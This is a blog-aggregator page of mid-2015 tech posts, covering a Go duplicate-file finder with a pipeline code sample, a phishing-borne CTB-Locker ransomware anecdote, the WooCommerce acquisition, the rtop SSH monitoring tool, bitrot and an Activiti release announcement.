While I understand how the differences between the various approaches have come to exist, I'm not sure I understand why they are necessary. Clearly, there's some room for improvement here.

As anyone who reads the above may see, doing an upload for squeeze-lts is in fact the easiest of the three "stable" approaches, since no intermediate steps are required. While I'm not about to advocate dropping all procedures everywhere, a streamlining of them might be appropriate.

May 24, 2015 07:18 PM

May 23, 2015

Ruben Vermeersch

dupefinder - Removing duplicate files on different machines

Imagine you have an old and a new computer. You want to get rid of that old computer, but it still contains loads of files. Some of them are already on the new one, some aren’t. You want to get the ones that aren’t: those are the ones you want to copy before tossing the old machine out.

That was the problem I was faced with. Not willing to do the tedious task of comparing and merging files manually, I decided to write a small tool for it. Since it might be useful to others, I’ve made it open-source.

Introducing dupefinder

Here’s how it works:

  1. Use dupefinder to generate a catalog of all files on your new machine.
  2. Transfer this catalog to the old machine
  3. Use dupefinder to detect and delete any known duplicate
  4. Anything that remains on the old machine is unique and needs to be transferred to the new machine

You can get it in two ways: there are pre-built binaries on Github, or you may use go get:

go get github.com/rubenv/dupefinder/...

Usage should be pretty self-explanatory:

Usage: dupefinder -generate filename folder...
    Generates a catalog file at filename based on one or more folders

Usage: dupefinder -detect [-dryrun / -rm] filename folder...
    Detects duplicates using a catalog file in one or more folders

  -detect=false: Detect duplicate files using a catalog
  -dryrun=false: Print what would be deleted
  -generate=false: Generate a catalog file
  -rm=false: Delete detected duplicates (at your own risk!)

Full source code on Github

Technical details

Dupefinder was written using Go, which is my default choice of language nowadays for this kind of tool.

There’s no doubt that you could use any language to solve this problem, but Go really shines here. The combination of lightweight-threads (goroutines) and message-passing (channels) make it possible to have clean and simple code that is extremely fast.

Internally, dupefinder is a simple pipeline: a file crawler feeds a pool of hashers, which feed a single result processor.

Each of these stages runs as a goroutine, with one hashing goroutine per CPU core, and the stages communicate over channels.

The beauty of this design is that it’s simple and efficient: the file crawler ensures that there is always work to do for the hashers, the hashers just do one small task (read a file and hash it) and there’s one small task that takes care of processing the results.

The end-result?

A multi-threaded design, with no locking misery (the channels take care of that), in what is basically one small source file.
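
To make this concrete, here is a minimal sketch of such a crawler → hashers → collector pipeline in Go. It is not the actual dupefinder source: the hash choice (MD5), the struct fields and the minimal error handling are illustrative assumptions.

package main

import (
    "crypto/md5"
    "fmt"
    "io"
    "os"
    "path/filepath"
    "runtime"
    "sync"
)

type hashedFile struct {
    path string
    hash string
}

func main() {
    // Expects a single folder argument, e.g.: ./pipeline /some/folder
    paths := make(chan string)
    results := make(chan hashedFile)

    // Crawler: walk the tree and feed file paths to the hashers.
    go func() {
        filepath.Walk(os.Args[1], func(path string, info os.FileInfo, err error) error {
            if err == nil && info.Mode().IsRegular() {
                paths <- path
            }
            return nil
        })
        close(paths)
    }()

    // Hashers: one goroutine per CPU core, each reads a file and hashes it.
    var wg sync.WaitGroup
    for i := 0; i < runtime.NumCPU(); i++ {
        wg.Add(1)
        go func() {
            defer wg.Done()
            for path := range paths {
                f, err := os.Open(path)
                if err != nil {
                    continue
                }
                h := md5.New()
                io.Copy(h, f)
                f.Close()
                results <- hashedFile{path: path, hash: fmt.Sprintf("%x", h.Sum(nil))}
            }
        }()
    }

    // Close the results channel once all hashers are done.
    go func() {
        wg.Wait()
        close(results)
    }()

    // Collector: a single loop processes the results; no locks needed.
    seen := map[string]string{}
    for r := range results {
        if original, ok := seen[r.hash]; ok {
            fmt.Printf("%s is a duplicate of %s\n", r.path, original)
        } else {
            seen[r.hash] = r.path
        }
    }
}

The crawler and the collector never touch shared state at the same time; all coordination happens through the two channels, which is exactly what keeps this kind of design free of locking misery.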

Any language can be used to get this design, but Go makes it so simple to quickly write this in a correct and (dare I say it?) beautiful way.

And let’s not forget the simple fact that this trivially compiles to a native binary on pretty much any operationg system that exists. Highly performant cross-platform code with no headaches, in no time.

The distinct lack of bells and whistles makes Go a bit of an odd duck among modern programming languages. But that’s a good thing. It takes some time to wrap your head around the language, but it’s a truly refreshing experience once you do. If you haven’t done so, I highly recommend playing around with Go.




May 23, 2015 11:44 AM

May 22, 2015

Xavier Mertens

When Security Makes Users Asleep!

AsleepIt’s a fact, in industries or on building sites, professional people make mistakes or, worse, get injured. Why? Because their attention is reduced at a certain point. When you’re doing the same job all day long, you get tired and lack of concentration. The same can apply in information security! For a long time, more and more solutions are deployed in companies to protect their data and users. Just make your wishlist amongst firewalls, (reverse-)proxies, next-generation firewalls, ID(P)S, anti-virus, anti-malware, end-point protection, etc (The list is very long). Often multiple lines of defenses are implemented with different firewalls, segmented networks, NAC. The combination of all those security controls tend to reduce successful attacks to a minimum. “To tend” does not mean that all of them will be blocked! A good example are phishing emails, they remain a very good way to abuse people. If most of them will be successfully detected, only one may have disastrous impacts. Once dropped in a user mailbox, there are chances that the potential victim will be asleep… Indeed, the company spent a lot of money to protect its infrastructure so the user will think “My company is doing a good job at protecting myself, so if I receive a message in my mailbox, I can trust it!“. Here is a real life example I’m working on.

A big organization received a very nicely formatted email from a business partner. The mail had an attachment pretending to be a pending invoice and was sent to <info@company.com>. The person reading the info mailbox forwarded it, logically, to the accounting department. There, an accountant read the mail (coming from a trusted partner and forwarded by a colleague – what could go wrong?) and opened the attachment. No need to tell the rest of the story, you can imagine what happened. The malicious file was part of a new CTB-Locker campaign: it had been generated only a few hours before the attack and, no luck, the installed solutions were not (yet) able to detect it. The malicious file successfully passed the following controls:

Users, don’t fall aspleep! Keep your eyes open and keep in mind that the controls deployed by your company are a way to reduce the risks of attacks. You car has ABS, ESP, cross-lane detection systems and much more but you still need to pay attention to the road! The same applies in IT, stay safe…

by Xavier at May 22, 2015 11:53 AM

Dries Buytaert

Why WooMattic is big news for small businesses

Earlier this week Matt Mullenweg, founder and CEO of Automattic, parent company of WordPress.com, announced the acquisition of WooCommerce. This is a very interesting move that I think cements the SMB/enterprise positioning between WordPress and Drupal.

As Matt points out, a huge percentage of the digital experiences on the web are now powered by open source solutions: WordPress, Joomla and Drupal. Yet one question the acquisition may raise is: "How will open source platforms drive ecommerce innovation in the future?"

Larger retailers with complex requirements usually rely on bespoke commerce engines or build their online stores on solutions such as Demandware, Hybris and Magento. Small businesses access essential functions such as secure transaction processing, product information management, shipping and tax calculations, and PCI compliance from third-party solutions such as Shopify, Amazon's merchant services and, increasingly, solutions from Squarespace and Wix.

I believe the WooCommerce acquisition by Automattic puts WordPress in a better position to compete against the slickly marketed offerings from Squarespace and Wix, and defend WordPress's popular position among small businesses. WooCommerce brings to WordPress a commerce toolkit with essential functions such as payments processing, inventory management, cart checkout and tax calculations.

Drupal has a rich library of commerce solutions ranging from Drupal Commerce -- a library of modules offered by Commerce Guys -- to connectors offered by Acquia for Demandware and other ecommerce engines. Brands such as LUSH Cosmetics handle all of their ecommerce operations with Drupal; others, such as Puma, use a Drupal-Demandware integration to combine the best elements of content and commerce to deliver stunning shopping experiences that break down the old division between brand marketing experiences and the shopping process. Companies such as Tesla Motors have created their own custom commerce engine and rely on Drupal to deliver the front-end customer experience across multiple digital channels, from traditional websites to mobile devices, in-store kiosks and more.

To me, this further accentuates the division of the CMS market with WordPress dominating the small business segment and Drupal further solidifying its position with larger organizations with more complex requirements. I'm looking forward to seeing what the next few years will bring for the open source commerce world, and I'd love to hear your opinion in the comments.

by Dries at May 22, 2015 03:38 AM

May 21, 2015

Mattias Geniar

rtop: Remote System Monitoring Via SSH


This is a simple but effective tool: rtop.

rtop is a remote system monitor. It connects over SSH to a remote system and displays vital system metrics (CPU, disk, memory, network). No special software is needed on the remote system, other than an SSH server and working credentials.

You could question why you wouldn't just SSH into the box and run top, but hey, let's just appreciate rtop for what it is: a simple overview of the system's state and performance.

Installation

Not that hard: you just need Go installed.

$ git clone --recursive http://github.com/rapidloop/rtop
$ cd rtop
$ make

For a few days, there was a problem with connecting over keys that use passphrases, but that was resolved in issue #16.

Running rtop

As easy as installing it.

rtop user@host:2222 1

This translates to: connect as user to host over SSH on port 2222, refreshing the stats every 1 second.

And then you have your output.

./rtop user@host:2222 1
host.domain.tld up 57d 22h 32m 7s

Load:
    0.19 0.05 0.01

Processes:
    1 running of 240 total

Memory:
    free    = 573.58 MiB
    used    =   1.89 GiB
    buffers = 144.43 MiB
    cached  =   1.05 GiB
    swap    =   4.00 GiB free of   4.00 GiB

Filesystems:
           /:  21.25 GiB free of  23.23 GiB

Network Interfaces:
    eth0 - 192.168.10.5/26, fe80::aa20:66ff:fe0d/64
      rx = 523.23 GiB, tx = 4972.94 GiB

    lo - 127.0.0.1/8, ::1/128
      rx =   2.69 GiB, tx =   2.69 GiB

Pretty neat summary of the system.

The post rtop: Remote System Monitoring Via SSH appeared first on ma.ttias.be.

by Mattias Geniar at May 21, 2015 09:30 PM

Frank Goossens

Instant Pages vs Instant Web?

Again, an interesting ALA article about web performance (or the lack thereof), triggered by Facebook’s “Instant Articles” announcement:

I think we do have to be better at weighing the cost of what we design, and be honest with ourselves, our clients, and our users about what’s driving those decisions. This might be the toughest part to figure out, because it requires us to question our design decisions at every point. Is this something our users will actually appreciate? Is it appropriate? Or is it there to wow someone (ourselves, our client, our peers, awards juries) and show them how talented and brilliant we are?

This exercise clearly starts in the design phase, because thinking about performance in the development or testing phase is simply too late.

by frank at May 21, 2015 05:17 AM

May 20, 2015

Mattias Geniar

Bitrot


Nothing new, but I recently got reminded of this bitrot thing.

Let's talk about "bitrot," the silent corruption of data on disk or tape. One at a time, year by year, a random bit here or there gets flipped. If you have a malfunctioning drive or controller—or a loose/faulty cable—a lot of bits might get flipped. Bitrot is a real thing, and it affects you more than you probably realize.

The JPEG that ended in blocky weirdness halfway down? Bitrot. The MP3 that startled you with a violent CHIRP!, and you wondered if it had always done that? No, it probably hadn't—blame bitrot. The video with a bright green block in one corner followed by several seconds of weird rainbowy blocky stuff before it cleared up again? Bitrot.

Bitrot and atomic COWs: Inside “next-gen” filesystems

If you're an Accidental Tech Podcast listener, you'll have heard John's rants on HFS+ and bitrot by now. Here's some reading material to keep you focused:

For the next few weeks, every unexplained filesystem corruption error I encounter will be blamed on bitrot.

The post Bitrot appeared first on ma.ttias.be.

by Mattias Geniar at May 20, 2015 07:08 PM

Joram Barrez

Launching Activiti version 6 in Paris (June 10th)!

The Activiti engine was born five years ago and we started with version 5.0 (a cheeky reference to our jBPM past). In those five years we’ve seen Activiti grow beyond our wildest dreams. It is used all across the globe in all kinds of cool companies. The last couple of months we’ve been working very hard at […]

by Joram Barrez at May 20, 2015 06:40 PM